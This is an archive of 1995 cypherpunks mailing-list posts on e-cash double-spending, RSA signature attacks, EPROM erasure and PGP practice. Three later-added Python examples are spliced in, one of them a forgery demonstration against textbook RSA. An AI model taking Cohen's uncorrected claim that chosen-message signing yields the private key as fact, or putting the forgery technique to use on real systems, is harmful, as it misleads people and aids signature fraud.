>you bitbankers.  Even me.  See you there!
>
A handful of interested students from Manuel Blum's Crypto class at
Berkeley will likely be attending (sort of an unofficial field trip).
I've managed to raise awareness and interest in this issue among the
class.

   - Ian "I doubt some of these grad students even _have_ banker outfits..."




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fc@all.net (Dr. Frederick B. Cohen)
Date: Thu, 19 Oct 95 08:00:57 PDT
To: pdlamb@iquest.com (Patrick Lamb)
Subject: Re: [NOISE] Re: Postscript in Netscape
In-Reply-To: <199510191439.JAA05986@vespucci.iquest.com>
Message-ID: <9510191458.AA14604@all.net>
MIME-Version: 1.0
Content-Type: text


...
> (b) flame one Netscape employee for not knowing everything you know?  If
> there are all of 5+ refereed publications in this area, how about giving
> references?  It would take up less space than your recurring venom eruption!
> Or couldn't you understand the papers, given that you couldn't understand
> the news clip...

I tried to take this discussion off line with the Netscape employee, but
he brought it back by CCing the list.  The references are available on
my W3 server (see the URL below) and searchable along with 350+ other
references on information security, most of them annotated.

In terms of taking up space, your replies to the list take up space as
well.  If you want me to list references for you, send me email without
CCing the rest of the list, and I will send you more than you are likely
to want to read.

The people at Netscape STILL have not told those of us on the list what
is meant by "security" in their claims.  Does it include integrity?
Confidentiality?  Availability?  Reduced liability?  Something else?
I await a responsive answer.

-- 
-> See: Info-Sec Heaven at URL http://all.net
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 19 Oct 95 10:49:35 PDT
To: cypherpunks@toad.com
Subject: Re: DalSemi: Add-Only Memory for Storage of Digital Cash (fwd)
Message-ID: <acabd56b3c0210041857@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 1:46 PM 10/19/95, Nathan Loofbourrow wrote:
(quoting someone else...)

> >      Perhaps someone with more semiconductor physics background
> > can correct me, but my understanding is that some kinds of nuclear
> > radiation can be used to erase OTP EPROMS.   I suppose this might damage

Sure, x-rays can erase EPROM cells. (Not the dosages found in airport x-ray
machines, anticipating the usual question someone raises when they hear
this.)

> > the crystal lattice badly enough to render the device useless in
> > some bit positions or reduce data retention time a lot, but I sure
> > wouldn't bet any security on devices out there not being
> > arbitrarily reprogrammable (thus using bits to represent digital
> > coins in a wallet that get reset when they are spent is not a
> > good idea).

The details of whether one can x-ray (or gamma-ray, etc.) erase a one-time
programmable (OTP) device without semi-permanently damaging it depend on a
lot of factors. Generally, an EPROM-based OTP device will erase under
irradiation before it is damaged. (At least this was my experience. Your
erasage may vary.)

>You might want to take a look at the paper I mentioned, then: I
>believe that irradiation of the OTP EPROM to return all bits to "ones"
>is too blunt a tool to do you any good. A virgin EPROM has a value of
>zero in the suggested scheme. And, as mentioned, flipping random sets
>of bits is strongly likely to get you caught.

Whether a floating gate empty of electrons ("erased") is considered to be a
"zero" or a "one" is wholly dependent on conventions in the design....one
manufacturer may treat "erased" bits as zeroes, another as ones. (The sense
of the charge may invert several times on the way through the sense
amplifiers and decoding logic.)

Bottom line: I'd take a bet that I could bulk-erase a Dallas Semi chip
without damaging it permanently, even if it lacked a transparent lid. But I
wouldn't take a bet that I can then reprogram it so as to spoof another
such chip.

Continuing on to some other points:

>I seem to remember PROMs actually undergoing physical, rather than
>electrical, state changes (that were presumably nonreversible). Am I
>recalling old technology, or am I just plain mistaken?

There are several kinds of "programmable read-only memories" (PROMs):

* Fusible-link PROMs, in which a silicon, nichrome, or other fuse is
"blown" by passing an appropriate current through the fuse. These are
indeed nonreversible changes (though a failure mechanism is for fuses to
"grow back"). And there are variants involving "anti-fuses."

* _Erasable_ PROMs, in two main categories:

- UV-EPROMs, or just EPROMs, in which a dosage of UV light through a
transparent window (quartz or sapphire) erases the EPROM cells. This works
by the UV photons supplying enough energy to the electrons stored in isolated
("floating") polysilicon gates so that they leave the floating gates and are
conducted away. Programming is done by forcing electrons to be
avalanche-injected onto the floating gates.

- EE-PROMs, or EEPROMs, or "E-squared PROMs," in which UV light is not
needed. A suitable electrical bias can cause a cell to be erased (i.e., to
allow electrons on floating gates to leave).

* And there are all sorts of wrinkles, variants, and other issues:

- Transparent lids vs. no lids. EEPROMs obviously need no transparent lids.
Even EPROMs may be built without transparent lids, if the intended use is
for customers to program them _once_ and only once ("OTP").

- Bit-erase vs. block-erase. Whether individual bits in an EEPROM can be
erased without neighboring bits being erased. A design issue. (Obviously
UV-EPROMs are only used in block-erase situations, where the block is the
entire memory.)

Intel built a "Key-PROM," circa 1983-5, in which the innards were somewhat
encrypted against outside-reading. My electron-beam testing lab was able to
image the internal states of these devices and so bypass the encryption.
(But it was enough for casual use to foil certain types of copying.)

I hope this helps. Semiconductor physics is its own specialty, like crypto.

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 19 Oct 95 11:06:25 PDT
To: cypherpunks@toad.com
Subject: Errors in the Cyphernomicon FAQ
Message-ID: <acabdf373d0210046595@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 4:29 PM 10/19/95, Scott Brickner wrote:
>Andreas Bogk writes:
...
>>
>>In the Cyphernomicon, section 12.6.6, Tim May writes:
>>
>>             - Chaum went to great lengths to develop system which
....

>>But as far as I got Chaum's idea, Alice would not reveal Bob's identity,
>>but rather her own. Am I missing a point here?
>
>You're right.  Tim's wrong.  Bob can't spend the money Alice gave him
>without depositing it in the bank and getting new money issued.  Each
>coin has "This money was issued to Alice" as an invisible imprint which
>only shows up when two coins with the same serial number are together.

Well, it's surely not the only error in my Cyphernomicon FAQ.

I might say I'll correct mistakes pointed out to me, except that there may
never be a second edition of that Cyphernomicon--the work to make changes
and then upload copies is just too staggering, and I've happily put aside
plans to keep it "current" with the flood of new stuff coming over the list
every day.

As I've said in earlier explanations, I wrote the thing because people were
always clamoring "Where's the FAQ? How come there's no FAQ? I want to see a
FAQ!" After several people volunteered to work on a FAQ, and none appeared,
I stupidly volunteered. Eventually, 8 months later, my Cyphernomicon
appeared.

And, sure enough, there have been calls recently for a "new FAQ."
Complaints that the Cyphernomicon is "too long" and that it "doesn't have
anything on the Netscape hacks." Well, be my guest. But beware the problem
that topics drift in and out of au courancy (probably not a valid word),
that today's big focus on bugs in Netscape is perhaps not what a FAQ on
Cypherpunks issues might want to emphasize.

But, nobody's stopping others from writing FAQs.

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jiri Baum <jirib@sweeney.cs.monash.edu.au>
Date: Wed, 18 Oct 95 18:21:36 PDT
To: hfinney@shell.portal.com (Hal)
Subject: Re: Anonymity: A Modest Proposal
In-Reply-To: <199510181636.JAA17879@jobe.shell.portal.com>
Message-ID: <199510190120.LAA29179@sweeney.cs.monash.edu.au>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Hello,

Hal <hfinney@shell.portal.com> wrote:
 
(replying to Eli Brandt <eli@UX3.SP.CS.CMU.EDU>)

> I think splitting the message would be OK, but then the question is who
> is responsible for reassembling it?  If there were a "reassembly
> server" which took such messages, assembled them, and forwarded them,
> then we would be right back where we started from.  If the end user is
...

Not really. Wouldn't there be a different politic to reassembling
messages as opposed to anonymous remailing?

Such a reassembly server could cooperate with the authorities, nay, even
precede each message with a PGP-signed list of where the various pieces
came from. On second thoughts that last is a bad idea (because
you might want the first line to be eg a reply block), but such a list
could be published on WWW by Message-ID (or Subject, or ...).

The remailers thus implicated have the defence that they could not possibly
have known the contents of the message, because it was split.

Actually, the same end can be achieved by having a non-anonymous remailer,
which simply decrypts and mails - and cooperates with the authorities.
It doesn't even need to strip the headers. However, such a thing would
probably have no other function than this so it might be harder to run.

(A reassembly server would have the stated function of implementing
k-of-n splits, eg for key/document escrow etc. Pieces coming in anonymously
would be merely permitted, not expected.)


BTW: s1018954@aix2.uottawa.ca wrote:

> On Wed, 18 Oct 1995, t byfield wrote:
...
> > header-forging: it's a practical fact of the net, and one that maybe
> > shouldn't be overlooked on (basically vague) 'moral' grounds, any more than
> 
> The courts can't overlook it either. There goes liability. If I posted 
> pirated software from this account, according to what you're saying, I could 
> claim a forgery and show reasonable doubt.

I understand that a post of mine on Cypherpunks had certain piece
of CoS scripture added to it. The original post was signed, and the
person or persons responsible did not attempt to include the
addition within the signed part (merely attached it to the end) so
the signature still checked out.

Even on cypherpunks somebody replied to that addition with the
attribution "Jiri Baum wrote" without noting it wasn't signed by me.

(Called it "drivil", too, but I guess that's between him, his English 
teacher and the CoS.)

"Richard Martin" <rmartin@aw.sgi.com> replied to s.:

...
> *If* we were all wonderful little cypher-junkies and signed
> everything, then we might plausibly be able to deny forged mail: "I
...

Well, I sign everything, don't I? (Somebody please tell me if I don't.)

No I don't have it hard-coded into my mailer. However it's easy enough
to do as it is:
  ":w qqq", switch windows or ^Z, "pgp -sat qqq", go back, "dG:r qqq.asc".

...
> I'm looking forward to the point where my mail reader will sort things
> according to reputations I give correspondents, and perhaps flag mail
...

Yup. Why don't you write one? ("cypherpunks write code")


Hope that makes sense...

Jiri
- --
If you want an answer, please mail to <jirib@cs.monash.edu.au>.
On sweeney, I may delete without reading!
PGP 463A14D5 (but it's at home so it'll take a day or two)
PGP EF0607F9 (but it's at uni so don't rely on it too much)

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i

iQCVAwUBMIWnqCxV6mvvBgf5AQH5rgQAuQb2Q86dlORTGyByuZA9Uw1P+66gqune
FWWc6uNFYysP6pjX0kl+Z3BVlYLJieRrY5wO/J1pJDOXcJC4NqAShfW8gXpA0F27
kkNc9yE+418ppdF5tyInjOGAHdeQyLQ0Klqthb2lBXo7pjAagEc9wXnlCRT8sj1i
9FXXZ4yDgjs=
=Bnu1
-----END PGP SIGNATURE-----
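
Added example, not part of the original post: a Python check for the situation described above, where text appended after a clearsigned block rides along with a signature that still verifies. It only separates signed from unsigned text using the standard clearsign framing and does not verify the signature itself; the sample message and all function names are constructed for the illustration.

```python
BEGIN_MSG = "-----BEGIN PGP SIGNED MESSAGE-----"
BEGIN_SIG = "-----BEGIN PGP SIGNATURE-----"
END_SIG = "-----END PGP SIGNATURE-----"

# Constructed sample: a signed body, a placeholder signature, and a line
# that somebody appended after the signature block.
SAMPLE = """\
From: signer@example.org

-----BEGIN PGP SIGNED MESSAGE-----

I will bring the slides on Friday.
- --Signer
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i

PLACEHOLDERnotARealSignature
-----END PGP SIGNATURE-----

Also, please wire the money today.
"""


def split_clearsigned(text: str) -> dict:
    """Split a message into the text the signature covers and the rest.

    Returns {"before": [...], "signed": [...], "after": [...]} as lists of
    lines. Raises ValueError if no complete clearsigned block is present.
    """
    lines = text.splitlines()
    marks = [line.rstrip() for line in lines]
    try:
        start = marks.index(BEGIN_MSG)
        sig = marks.index(BEGIN_SIG, start + 1)
        end = marks.index(END_SIG, sig + 1)
    except ValueError:
        raise ValueError("no complete clearsigned block found") from None

    # Optional armor headers ("Hash: ...") end at the first blank line.
    body = start + 1
    while body < sig and marks[body] and ": " in marks[body]:
        body += 1
    if body >= sig or marks[body]:
        raise ValueError("missing blank line before the signed text")

    # Signed lines starting with "-" are dash-escaped as "- " on the wire,
    # so a real armor boundary can never occur inside the signed text.
    signed = [l[2:] if l.startswith("- ") else l for l in lines[body + 1:sig]]
    return {
        "before": [l for l in lines[:start] if l.strip()],
        "signed": signed,
        "after": [l for l in lines[end + 1:] if l.strip()],
    }


def covered_by_signature(text: str, quote: str) -> bool:
    """True only if `quote` lies inside the signed portion of `text`."""
    return quote in "\n".join(split_clearsigned(text)["signed"])


if __name__ == "__main__":
    parts = split_clearsigned(SAMPLE)
    print("signed:  ", parts["signed"])
    print("unsigned:", parts["before"] + parts["after"])
```

Anything reported under "before" or "after" may not be attributed to the signer on the strength of the signature, whatever the verifier says about the block itself.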



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Joseph M. Reagle Jr." <reagle@rpcp.mit.edu>
Date: Thu, 19 Oct 95 08:20:39 PDT
To: cypherpunks@toad.com
Subject: Oppenheimer Quote Regarding Government Secrecy and Public Policy
Message-ID: <9510191524.AA11016@rpcp.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


Rather liked this quote regarding the development of the super in the 1950s.

J. Robert Oppenheimer, "Atomic Weapons and American Policy," Foreign
Affairs, Vol. 31, No. 4, July 1953, p. 525.

 [We must have] candor on the part of the officials of the United States
Government to the officials, the representatives, the people of their
country.  We do not operate well when the important facts, the essential
conditions, which limit and determine our choices are unknown.  We do not
operate well when they are known, in secrecy and in fear, only to a few men.
        The political vitality of our country largely derives from two
sources.  One is the interplay, the conflict of opinion and debate, in many
diverse and complex agencies, legislative and executive, which contribute to
the making of policy.  The other is a public opinion which is based on
confidence that it knows the truth.
        Today public opinion cannot exist in this field.  No responsible
person will hazard an opinion in a field where he believes that there is
somebody else who knows the truth, and where he believes that he does not
know it.

-------------------------
Regards,                 I hate people when they aren't polite - Talking Heads
Joseph M. Reagle Jr.     http://farnsworth.mit.edu/~reagle/home.html
reagle@mit.edu           0C 69 D4 E8 F2 70 24 33  B4 5E 5E EC 35 E6 FB 88





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Scott Brickner <sjb@universe.digex.net>
Date: Thu, 19 Oct 95 09:29:46 PDT
To: Andreas Bogk <andreas@artcom.de>
Subject: Re: digital cash and identity disclosure
In-Reply-To: <m0t5ej6-0002ebC@horten>
Message-ID: <199510191629.MAA28243@universe.digex.net>
MIME-Version: 1.0
Content-Type: text/plain


Andreas Bogk writes:
>-----BEGIN PGP SIGNED MESSAGE-----
>
>Hi...
>
>In the Cyphernomicon, section 12.6.6, Tim May writes:
>
>             - Chaum went to great lengths to develop system which
>                preserve anonymity for single-spending instances, but
>                which break anonymity and thus reveal identity for double-
>                spending instances. I'm not sure what market forces
>                caused him to think about this as being so important, but
>                it creates many headaches. Besides being clumsy, it
>                require physical ID, it invokes a legal system to try to
>                collect from "double spenders," and it admits the
>                extremely serious breach of privacy by enabling stings.
>                For example, Alice pays Bob a unit of money, then quickly
>                Alice spends that money before Bob can...Bob is then
>                revealed as a "double spender," and his identity revealed
>                to whomever wanted it...Alice, IRS, Gestapo, etc. A very
>                broken idea. Acceptable mainly for small transactions.
>
>But as far as I got Chaum's idea, Alice would not reveal Bob's identity,
>but rather her own. Am I missing a point here?

You're right.  Tim's wrong.  Bob can't spend the money Alice gave him
without depositing it in the bank and getting new money issued.  Each
coin has "This money was issued to Alice" as an invisible imprint which
only shows up when two coins with the same serial number are together.
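
Added example, not part of the original post: a simplified Python model of the "invisible imprint" described above, in the style of the Chaum-Fiat-Naor offline construction, where the withdrawer's identity is split into pairs of halves and each payment opens one half per pair. The bank's blind signature on the coin is omitted, and K, the account string and all class and function names are assumptions made for the illustration.

```python
import hashlib
import secrets

K = 16        # identity pairs per coin (constructed parameter)
ID_LEN = 32   # identities are zero-padded to this length


def commit(value: bytes, nonce: bytes) -> bytes:
    """Hash commitment that hides `value` until (value, nonce) is opened."""
    return hashlib.sha256(nonce + value).digest()


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


class Coin:
    """Withdrawer's secret state for one coin (blind signature omitted)."""

    def __init__(self, identity: bytes):
        if len(identity) > ID_LEN:
            raise ValueError("identity too long")
        ident = identity.ljust(ID_LEN, b"\0")
        self._halves = []
        for _ in range(K):
            pad = secrets.token_bytes(ID_LEN)
            # Each half alone is uniformly random; XORed they give ident.
            self._halves.append(((pad, secrets.token_bytes(16)),
                                 (xor(pad, ident), secrets.token_bytes(16))))
        # Public part of the coin: commitments to both halves of every pair.
        self.commitments = [(commit(*left), commit(*right))
                            for left, right in self._halves]

    def spend(self, challenge):
        """Open the half of each pair selected by the payee's challenge bits."""
        return [self._halves[i][bit] for i, bit in enumerate(challenge)]


def payee_verify(commitments, challenge, response) -> bool:
    """Payee's check that every opened half matches the coin's commitments."""
    if not (len(commitments) == len(challenge) == len(response) == K):
        return False
    if any(bit not in (0, 1) for bit in challenge):
        return False
    return all(commit(value, nonce) == commitments[i][bit]
               for i, (bit, (value, nonce))
               in enumerate(zip(challenge, response)))


def serial_of(commitments) -> str:
    h = hashlib.sha256()
    for left, right in commitments:
        h.update(left + right)
    return h.hexdigest()


class Bank:
    def __init__(self):
        self._deposits = {}   # serial -> first (challenge, response) seen

    def deposit(self, commitments, challenge, response):
        if not payee_verify(commitments, challenge, response):
            return ("rejected", None)
        serial = serial_of(commitments)
        if serial not in self._deposits:
            self._deposits[serial] = (list(challenge), list(response))
            return ("accepted", None)
        old_challenge, old_response = self._deposits[serial]
        for i in range(K):
            if old_challenge[i] != challenge[i]:
                # Both halves of pair i are now known: XOR gives the identity.
                ident = xor(old_response[i][0], response[i][0])
                return ("double-spend", ident.rstrip(b"\0"))
        # Same transcript twice: the payee re-deposited, nothing new opened.
        return ("duplicate-transcript", None)


if __name__ == "__main__":
    coin, bank = Coin(b"alice-acct-1042"), Bank()   # constructed identity
    for payee in ("bob", "carol"):
        challenge = [secrets.randbits(1) for _ in range(K)]
        print(payee, bank.deposit(coin.commitments, challenge,
                                  coin.spend(challenge)))
```

The identity recovered on the second deposit is the one embedded at withdrawal, that is, the withdrawer who answered two different challenges, not the payee who deposited.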




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fc@all.net (Dr. Frederick B. Cohen)
Date: Thu, 19 Oct 95 08:32:30 PDT
To: hfinney@shell.portal.com (Hal)
Subject: Re: 50 attacks... [NOISE]
In-Reply-To: <199510191427.HAA10783@jobe.shell.portal.com>
Message-ID: <9510191529.AA15811@all.net>
MIME-Version: 1.0
Content-Type: text


> fc@all.net (Dr. Frederick B. Cohen) writes:
> >3 - I would have figured at least one of you would have looked up the
> >chosen plaintext attack and told me why Netscape keys can't be gotten
> >at this way.  I think there's an off chance I could win a grand!
> 
> I had missed this in your original posting.  Here it is again:
> 
> > Concept 3 - There is a chosen plaintext attack against the RSA (published
> > in the 1980s in a Crypto conference (IACR?).
> > 
> >         Attack 50 - Use your Hot Java capability to sign selected
> >         message after message till the attacker derives your private key.
> >        I think this takes one or two messages per bit of private key.
> 
> Chosen plaintext attacks against RSA don't work in the context of RSA
> signatures, because the input to the RSA algorithm is a hash of the
> message being signed.  You can't control the hash the way you need to to
> implement a chosen plaintext attack.  (You can't "choose" the hash.)
> 
> For example, one kind of chosen plaintext attack would be to get an RSA
> signature on 2, on 3, on 5, on 7, and so on, on all the primes.  This
> would let you create an RSA signature on any number by factoring the
> number and multiplying the RSA signatures of its prime factors.  But
> there is no way to do this in practice because as RSA-based signatures
> are actually implemented only hashes are signed.  This is done exactly to
> prevent this and similar attacks.

And how secure is the hash? Is it possible to create values that will
hash to each prime (or something else that does the job)? Is the hash
something we can figure a way to precompute using massively parallel
processing so that we can then provide a set of codes which will produce
the desired results? (etc.)


-- 
-> See: Info-Sec Heaven at URL http://all.net
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236
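
Added example, not part of the original thread: the multiplicative property Hal describes in the quoted text, and why hashing before signing removes it, shown in Python with a constructed toy RSA key. The key, the target value 360 and all function names are assumptions for the illustration; real signature schemes use standardized padding rather than a bare hash reduced mod N.

```python
import hashlib

# Constructed toy key (two Mersenne primes); far too small for real use.
P, Q = 2**31 - 1, 2**61 - 1
N, E = P * Q, 65537
D = pow(E, -1, (P - 1) * (Q - 1))


def raw_sign(m: int) -> int:
    """Textbook RSA: the signer exponentiates whatever number it is given."""
    return pow(m, D, N)


def raw_verify(m: int, sig: int) -> bool:
    return 0 <= sig < N and pow(sig, E, N) == m % N


def digest_int(message: bytes) -> int:
    return int.from_bytes(hashlib.sha256(message).digest(), "big") % N


def hashed_sign(message: bytes) -> int:
    """Hash-then-sign: the RSA input is a digest the requester cannot pick."""
    return pow(digest_int(message), D, N)


def hashed_verify(message: bytes, sig: int) -> bool:
    return 0 <= sig < N and pow(sig, E, N) == digest_int(message)


def factor_over(target: int, primes):
    """Exponents of `target` over `primes`, or None if a factor is missing."""
    exps = {}
    for p in primes:
        while target % p == 0:
            target //= p
            exps[p] = exps.get(p, 0) + 1
    return exps if target == 1 else None


def compose_signature(target: int, signed_primes: dict):
    """Build a raw signature on `target` from raw signatures on its prime
    factors, using only public values: sig(a) * sig(b) = sig(a * b) mod N."""
    exps = factor_over(target, signed_primes)
    if exps is None:
        return None
    sig = 1
    for p, k in exps.items():
        sig = sig * pow(signed_primes[p], k, N) % N
    return sig


def hashed_product_check():
    """Multiply two hash-then-sign signatures and see what the result is."""
    s = hashed_sign(b"2") * hashed_sign(b"3") % N
    product_of_digests = digest_int(b"2") * digest_int(b"3") % N
    # s is still a valid raw signature on the product of the two digests,
    # but it only helps if some message hashes to exactly that number.
    return raw_verify(product_of_digests, s), hashed_verify(b"6", s)


if __name__ == "__main__":
    sigs = {p: raw_sign(p) for p in (2, 3, 5)}   # signer only ever saw 2, 3, 5
    forged = compose_signature(360, sigs)
    print("raw signature on 360 verifies:", raw_verify(360, forged))
    print("hashed product (raw, as message b'6'):", hashed_product_check())
```

With hashing in place, the composed value is useful only to someone who can find a message whose digest equals a chosen number, which is the preimage question raised in the reply above.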



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Froomkin <froomkin@law.miami.edu>
Date: Thu, 19 Oct 95 08:32:40 PDT
To: cypherpunks <cypherpunks@toad.com>
Subject: ABA guidelines no longer read-only
Message-ID: <Pine.SUN.3.91.951019112705.19016B-100000@viper.law.miami.edu>
MIME-Version: 1.0
Content-Type: text/plain


I am informed by the webmaster of the page holding the guidelines that 
the Section leadership has authorized him to make the text downloadable 
and that he will make it available in various formats very soon.

This desirable result was, however, in no way helped by what I am also 
informed was juvenile and in at least one instance threatening email sent 
to the parties involved.   That the mail identified itself as originating 
from members of this list -- and in response to my message announcing the 
site existed -- can only have the result of devaluing any comment I and 
other people on this list may make.

Not a pretty sight. 

A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
Associate Professor of Law | 
U. Miami School of Law     | froomkin@law.miami.edu
P.O. Box 248087            | http://www.law.miami.edu/~froomkin
Coral Gables, FL 33124 USA | It's hot here.  And humid.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Greg_Rose@sibelius.sydney.sterling.com (Greg ROSE)
Date: Wed, 18 Oct 95 18:37:26 PDT
To: Chris Claborne <Chris.Claborne@sandiegoca.attgis.com>
Subject: Re: San Diego Cypherpunks Physical Meeting
In-Reply-To: <199510171835.OAA02450@ncrhub5.attgis.com>
Message-ID: <9510190138.AA43639@paganini.sydney.sterling.com>
MIME-Version: 1.0
Content-Type: text/plain




-----BEGIN PGP SIGNED MESSAGE-----

Chris Claborne <Chris.Claborne@sandiegoca.attgis.com> wrote:
     Don't forget to bring your public key  fingerprint.  If you can figure
  out how to get it on the back of a business card, that would be cool.  

This isn't so hard. See below. Unless you have a
somewhat longer name and email address than me,
you can print a page full of them and cut them up.

Basically all I did was edit the output of pgp -kvc 
to split the first line into two, and remove many
of the blanks from the fingerprint. Then
cut-and-paste in the editor to put two copies per
line. Then five copies of the lines. Then print it
at 9.5 point (most people could probably use 10
point, but "Greg Rose <Greg_Rose@sydney.sterling.com>"
is longer than a business card in 10 point
courier). I see that Chris's (presumed) PGP key
wouldn't fit, but vertically speaking you have
plenty of room for two keys, and could wrap the
name and email parts onto two lines.

The parameters to the lpr command are for HP/UX,
in case anyone is wondering. This way I just run
the script, rather than having to remember how to
get it printed.

Hope that helps,
Greg.

#!/bin/lpr -os9.5
pub  1024/4DBA1091 1994/11/29		      pub  1024/4DBA1091 1994/11/29
Gregory G. Rose <ggr@rss.com.au>	      Gregory G. Rose <ggr@rss.com.au>
6C9287223EEFE995 2B1CB9CCEC89A954	      6C9287223EEFE995 2B1CB9CCEC89A954
	
pub  1024/09D3E64D 1994/11/30		      pub  1024/09D3E64D 1994/11/30
Greg Rose <Greg_Rose@sydney.sterling.com>     Greg Rose <Greg_Rose@sydney.sterling.com>
350A797D5E218D47 E3537566ACFBD945	      350A797D5E218D47 E3537566ACFBD945





pub  1024/4DBA1091 1994/11/29		      pub  1024/4DBA1091 1994/11/29
Gregory G. Rose <ggr@rss.com.au>	      Gregory G. Rose <ggr@rss.com.au>
6C9287223EEFE995 2B1CB9CCEC89A954	      6C9287223EEFE995 2B1CB9CCEC89A954
	
pub  1024/09D3E64D 1994/11/30		      pub  1024/09D3E64D 1994/11/30
Greg Rose <Greg_Rose@sydney.sterling.com>     Greg Rose <Greg_Rose@sydney.sterling.com>
350A797D5E218D47 E3537566ACFBD945	      350A797D5E218D47 E3537566ACFBD945





pub  1024/4DBA1091 1994/11/29		      pub  1024/4DBA1091 1994/11/29
Gregory G. Rose <ggr@rss.com.au>	      Gregory G. Rose <ggr@rss.com.au>
6C9287223EEFE995 2B1CB9CCEC89A954	      6C9287223EEFE995 2B1CB9CCEC89A954
	
pub  1024/09D3E64D 1994/11/30		      pub  1024/09D3E64D 1994/11/30
Greg Rose <Greg_Rose@sydney.sterling.com>     Greg Rose <Greg_Rose@sydney.sterling.com>
350A797D5E218D47 E3537566ACFBD945	      350A797D5E218D47 E3537566ACFBD945





pub  1024/4DBA1091 1994/11/29		      pub  1024/4DBA1091 1994/11/29
Gregory G. Rose <ggr@rss.com.au>	      Gregory G. Rose <ggr@rss.com.au>
6C9287223EEFE995 2B1CB9CCEC89A954	      6C9287223EEFE995 2B1CB9CCEC89A954
	
pub  1024/09D3E64D 1994/11/30		      pub  1024/09D3E64D 1994/11/30
Greg Rose <Greg_Rose@sydney.sterling.com>     Greg Rose <Greg_Rose@sydney.sterling.com>
350A797D5E218D47 E3537566ACFBD945	      350A797D5E218D47 E3537566ACFBD945





pub  1024/4DBA1091 1994/11/29		      pub  1024/4DBA1091 1994/11/29
Gregory G. Rose <ggr@rss.com.au>	      Gregory G. Rose <ggr@rss.com.au>
6C9287223EEFE995 2B1CB9CCEC89A954	      6C9287223EEFE995 2B1CB9CCEC89A954
	
pub  1024/09D3E64D 1994/11/30		      pub  1024/09D3E64D 1994/11/30
Greg Rose <Greg_Rose@sydney.sterling.com>     Greg Rose <Greg_Rose@sydney.sterling.com>
350A797D5E218D47 E3537566ACFBD945	      350A797D5E218D47 E3537566ACFBD945







-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i

iQCVAwUBMIWsDaRQkCwJ0+ZNAQE+lwP+LZiwkE67iBmStEWaYB/vLqNk9NXi4mul
RthFMfadNICGpHAT2diSYoGomgtHIN8vADZGhKjzx0NqHlokgCePEZhiZF7frNsy
D5y4n4WsSOK7KT3dsKsa+LGt49QZc7Brgch1CVN5i4Ic9EN8X7labqeKBPf1rKYu
ffBrMl9y1Xk=
=+sqs
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 19 Oct 95 11:26:28 PDT
To: cypherpunks@toad.com
Subject: Re: digital cash and identity disclosure
Message-ID: <acabe4df3f021004b9f5@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 5:41 PM 10/19/95, Hal wrote:

>There is an attack here, but the text doesn't go into detail about it.
>You have to assume that (as with the current ecash implementation from
>Digicash) people have non-anonymous accounts with the bank.  If Alice
>wants to know Bob's identity she can collude with the bank to find
>out.  As Tim describes, she gives Bob some money, then quickly deposits
>the coins herself.  In effect, she intentionally double-spends (with
>the bank's permission).  When Bob makes his deposit, his coins are
>recognized as matching those which Alice double-spent.  So if Alice
>was, say, an agent involved in a government "sting", and bought bootleg
>software from Bob, his identity can in fact be learned when he deposits
>the money.
>
>Actually with the DigiCash system and in fact all of the ecash systems I
>know about, you don't have to get so fancy; Alice can simply give the
>bank a record of her transaction with Bob (the coins she sent him) and
>these will be recognized when Bob deposits them.
>
>Lucky Green has been discussing ways in which people could exchange coins
>anonymously even with DigiCash's ecash in order to provide some immunity
>from such attacks.

As Hal notes, there are a lot of issues and attacks to consider. I'm sorry
that my brief section on Chaumian digital cash in the Cyphernomicon doesn't
adequately cover the issues (and as the debates here show, confusion still
reigns, and no doubt some of my points are misleading, wrong, or
incomplete).

"Double spending" detection is a REAL MESS. That's my basic conclusion. It
tends to require schemes for going after double spenders, it tends to make
identity-revealing attacks possible (such as the attack I alluded to, and
that Hal more completely describes), and it's INELEGANT.

"Immediate clearing" is much more elegant, and is, I think, truer to the
spirit of "anonymous digital cash" than most of these other schemes are.
(Grep the FAQ for "online" or "online clearing" or "clearing" and you
should find some stuff. Also, several articles--including one recently by
me, about a month ago--go into the differences between the types of
clearing.)

--Tim May


Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
